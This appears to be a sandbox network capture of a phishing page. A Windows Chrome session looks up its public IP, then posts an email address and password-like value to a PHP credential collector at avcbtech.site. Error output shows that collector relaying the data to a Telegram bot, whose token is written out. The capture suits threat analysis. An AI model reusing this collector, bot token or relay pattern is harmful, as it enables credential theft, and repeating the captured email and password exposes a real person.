2025-03-27 17:29:48 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:29:33 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=eecc8cf92b2a83e067d465a9a112422b; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:29:48 UTC	898	IN	Data Raw: 33 33 66 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65 5f 67 65 74 5f 63 6f 6e 74 65 6e 74 73 28 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 37 37 39 33 30 36 34 39 30 30 3a 41 41 45 73 74 6b 75 43 75 61 6f 34 53 58 47 76 39 68 62 47 69 45 74 79 77 58 58 5f 67 39 6a 66 35 4b 73 2f 73 65 6e 64 4d 65 73 73 61 67 65 29 3a 20 66 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 48 54 54 50 20 72 65 71 75 65 73 74 20 66 61 69 6c 65 64 21 20 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 61 7a 76 69 78 74 62 61 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 6b 75 6b 2f 78 77 70 73 2e 70 68 70 3c 2f 62 Data Ascii: 33f<br /><b>Warning</b>: file_get_contents(https://api.telegram.org/bot7793064900:AAEstkuCuao4SXGv9hbGiEtywXX_g9jf5Ks/sendMessage): failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in <b>/home/azvixtba/public_html/kuk/xwps.php</b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49759	172.67.74.152	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:33 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:33 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:29:33 GMT Content-Type: application/json Content-Length: 22 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709c511d2443d6-EWR server-timing: cfL4;desc="?proto=TCP&rtt=88822&min_rtt=88795&rtt_var=18774&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=34389&cwnd=252&unsent_bytes=0&cid=56cbd2d4130c6e2d&ts=240&x=0"
2025-03-27 17:29:33 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49760	104.26.12.205	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:33 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:34 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:29:34 GMT Content-Type: application/json Content-Length: 22 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709c53c8bf3300-EWR server-timing: cfL4;desc="?proto=TCP&rtt=91596&min_rtt=90452&rtt_var=20260&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=33780&cwnd=252&unsent_bytes=0&cid=2f2600a88b77aa47&ts=238&x=0"
2025-03-27 17:29:34 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49762	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:49 UTC	389	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:49 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:29:49 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:29:49 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49763	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:56 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 57 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:56 UTC	57	OUT	Data Raw: 61 69 3d 6d 69 63 68 61 65 6c 2e 6d 61 73 73 65 6c 6c 69 25 34 30 70 68 61 72 6d 61 2e 63 6f 6d 26 70 72 3d 76 30 25 33 46 57 35 4c 4f 43 25 33 46 25 32 33 79 25 32 43 2a Data Ascii: ai=michael.masselli%40pharma.com&pr=v0%3FW5LOC%3F%23y%2C*
2025-03-27 17:30:14 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:29:57 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=15bd14434f6d892f7e23844347602fb3; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:30:14 UTC	898	IN	Data Raw: 33 33 66 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65 5f 67 65 74 5f 63 6f 6e 74 65 6e 74 73 28 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 37 37 39 33 30 36 34 39 30 30 3a 41 41 45 73 74 6b 75 43 75 61 6f 34 53 58 47 76 39 68 62 47 69 45 74 79 77 58 58 5f 67 39 6a 66 35 4b 73 2f 73 65 6e 64 4d 65 73 73 61 67 65 29 3a 20 66 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 48 54 54 50 20 72 65 71 75 65 73 74 20 66 61 69 6c 65 64 21 20 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 61 7a 76 69 78 74 62 61 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 6b 75 6b 2f 78 77 70 73 2e 70 68 70 3c 2f 62 Data Ascii: 33f<br /><b>Warning</b>: file_get_contents(https://api.telegram.org/bot7793064900:AAEstkuCuao4SXGv9hbGiEtywXX_g9jf5Ks/sendMessage): failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in <b>/home/azvixtba/public_html/kuk/xwps.php</b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49765	172.67.74.152	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:57 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:57 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:29:57 GMT Content-Type: application/json Content-Length: 22 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709ce6ec027c8d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=94313&min_rtt=93900&rtt_var=20431&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1121&delivery_rate=32118&cwnd=252&unsent_bytes=0&cid=99e3fe0f8a924a33&ts=252&x=0"
2025-03-27 17:29:57 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49766	104.26.12.205	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:29:57 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:29:58 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:29:58 GMT Content-Type: application/json Content-Length: 22 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709ce9cfae72bc-EWR server-timing: cfL4;desc="?proto=TCP&rtt=95147&min_rtt=94773&rtt_var=20361&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=32242&cwnd=252&unsent_bytes=0&cid=4d8b89156c9e4db1&ts=256&x=0"
2025-03-27 17:29:58 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49774	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:14 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
2025-03-27 17:30:15 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:15 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:30:15 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49779	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:28 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 36 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:30:28 UTC	36	OUT	Data Raw: 61 69 3d 6d 69 63 68 61 65 6c 2e 6d 61 73 73 65 6c 6c 69 25 34 30 70 68 61 72 6d 61 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=michael.masselli%40pharma.com&pr=
2025-03-27 17:30:29 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:29 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=363850d4307258b67e2b3ba985a0ff4c; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:30:29 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49781	172.67.74.152	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:29 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:30:29 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:29 GMT Content-Type: application/json Content-Length: 22 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709dae0dcbb9c5-EWR server-timing: cfL4;desc="?proto=TCP&rtt=89040&min_rtt=88974&rtt_var=18870&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=34274&cwnd=252&unsent_bytes=0&cid=7c8a9e2c83c3966f&ts=361&x=0"
2025-03-27 17:30:29 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49782	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:29 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
2025-03-27 17:30:30 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:29 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:30:30 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49783	104.26.12.205	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:29 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:30:30 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:30 GMT Content-Type: application/json Content-Length: 22 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709db17b58cdf0-EWR server-timing: cfL4;desc="?proto=TCP&rtt=89393&min_rtt=89377&rtt_var=18865&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=34199&cwnd=252&unsent_bytes=0&cid=3e68f5b90c1cf0e3&ts=238&x=0"
2025-03-27 17:30:30 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49788	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:41 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 36 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:30:41 UTC	36	OUT	Data Raw: 61 69 3d 6d 69 63 68 61 65 6c 2e 6d 61 73 73 65 6c 6c 69 25 34 30 70 68 61 72 6d 61 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=michael.masselli%40pharma.com&pr=
2025-03-27 17:30:41 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:41 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=8bf946c85baecc8497a88410caa729c7; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:30:41 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49790	172.67.74.152	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:41 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:30:41 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:41 GMT Content-Type: application/json Content-Length: 22 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709df9cbb819b2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=90331&min_rtt=89107&rtt_var=20639&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=32930&cwnd=252&unsent_bytes=0&cid=3457875ac54e38ff&ts=242&x=0"
2025-03-27 17:30:41 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49793	104.26.12.205	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:41 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:30:42 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:42 GMT Content-Type: application/json Content-Length: 22 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709dfc6bba42de-EWR server-timing: cfL4;desc="?proto=TCP&rtt=89664&min_rtt=89082&rtt_var=19370&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=34294&cwnd=252&unsent_bytes=0&cid=9d497994146d89dc&ts=253&x=0"
2025-03-27 17:30:42 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49791	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:41 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
2025-03-27 17:30:42 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:42 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:30:42 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
